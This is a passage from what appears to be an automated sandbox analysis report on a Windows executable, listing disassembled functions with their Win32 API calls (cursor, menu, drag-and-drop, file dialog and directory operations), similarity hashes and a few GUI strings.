                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                                                                            • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$Load$Info
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2577412497-0
                                                                                                                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                                                                            • GetFocus.USER32 ref: 004696E0
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$CtrlFocus
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1534620443-4108050209
                                                                                                                                                                            • Opcode ID: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                                                                                                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                                                                                                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00468107
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                            • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                            • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                            • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                            • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3993528054-4108050209
                                                                                                                                                                            • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                                                            • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                                                                            APIs
                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                            • API String ID: 4085615965-3440237614
                                                                                                                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004669C4
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                                                                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                            • String ID: X$HH
                                                                                                                                                                            • API String ID: 3021350936-1944015008
                                                                                                                                                                            • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                                                            • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1504565804-4108050209
                                                                                                                                                                            • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                            • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00455127
                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                                                                            • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00455207
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1663942905-4108050209
                                                                                                                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1481289235-0
                                                                                                                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
